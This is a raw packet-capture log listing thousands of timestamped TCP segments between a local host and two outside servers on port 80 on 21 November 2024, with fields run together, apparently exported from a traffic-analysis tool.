                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.339489937 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.340523958 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.340557098 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.340574980 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.340605974 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.341725111 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.341799974 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.341835976 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.341907024 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.342891932 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.342972040 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.343019009 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.343072891 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.397983074 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.428920031 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.428936005 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.428972960 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.429379940 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.429796934 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.429828882 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.429835081 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.431449890 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.431472063 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.431484938 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.433209896 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.433314085 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.433327913 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.434870005 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.434905052 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.434974909 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.436590910 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.436613083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.436635971 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.438210011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.438251019 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.438323021 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.439897060 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.439908981 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.439939022 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.441497087 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.441534996 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.441607952 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.443137884 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.443178892 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.443206072 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.444744110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.444786072 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.444859028 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.446336985 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.446378946 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.446418047 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.447906017 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.447947025 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.448004007 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.449460983 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.449496984 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.449568987 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.449963093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450001001 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450017929 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450064898 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450490952 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450539112 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450745106 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450800896 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450836897 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.450887918 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.451159000 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.451200008 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.451303005 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.451920033 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.451968908 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.452023983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.452081919 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.452549934 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.452589989 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.452591896 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.453110933 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.453150988 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.454066038 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.454108953 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.454169989 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.455593109 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.455636024 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.455646038 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.457093000 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.457140923 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.457190990 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.458606958 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.458647966 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.458770037 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.460110903 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.460148096 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.460167885 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.461549997 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.461591959 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.461695910 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.463001013 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.463040113 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.463074923 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.464466095 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.464503050 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.464553118 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.465922117 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.465961933 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.465996027 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.467365980 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.467410088 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.467447042 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.468847036 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.468884945 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.468945980 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.470403910 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.470443964 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.470446110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.471793890 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.471833944 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.471995115 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.473229885 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.473273039 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.473341942 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.474751949 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.474793911 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.474869967 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.476161957 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.476205111 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.476227999 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.477574110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.477607965 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.477699995 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.479032040 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.479072094 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.479242086 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.480490923 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.480531931 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.480657101 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.481940031 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.481980085 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.482034922 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.483403921 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.483444929 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.483496904 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.484843016 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.484885931 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.484956980 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487198114 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487236977 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487237930 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487250090 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487261057 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487273932 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487287045 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487320900 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487320900 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487364054 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487767935 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487808943 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.487871885 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.488092899 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.488133907 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.488145113 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.488176107 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489213943 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489250898 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489258051 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489269972 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489309072 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489336014 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.489377022 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490447998 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490498066 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490580082 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490636110 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490679979 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490689993 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.490724087 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.491632938 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.491684914 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.491734982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.491782904 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492129087 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492165089 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492196083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492803097 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492856026 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492893934 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.492948055 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.493577957 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.493622065 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.493654966 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.493993998 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.494043112 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.494098902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.494168043 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498047113 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498085022 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498696089 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498707056 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498755932 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498874903 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498887062 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498895884 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498905897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498917103 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498919964 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498970032 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.498972893 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499130011 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499177933 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499272108 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499336004 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499350071 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499396086 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.499505043 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500201941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500252008 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500363111 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500407934 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500909090 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.500953913 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.501096964 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.501602888 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.501652002 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.501764059 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.501808882 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502479076 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502527952 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502675056 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502686024 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502731085 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502836943 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.502887964 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503700018 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503736973 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503882885 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503892899 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503904104 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503942013 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.503976107 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505054951 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505067110 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505105972 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505136967 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505386114 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505398035 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.505429983 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506195068 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506249905 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506539106 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506589890 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506696939 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506738901 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.506767988 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.507384062 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.507397890 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.507425070 CET4980280192.168.2.4185.215.113.16
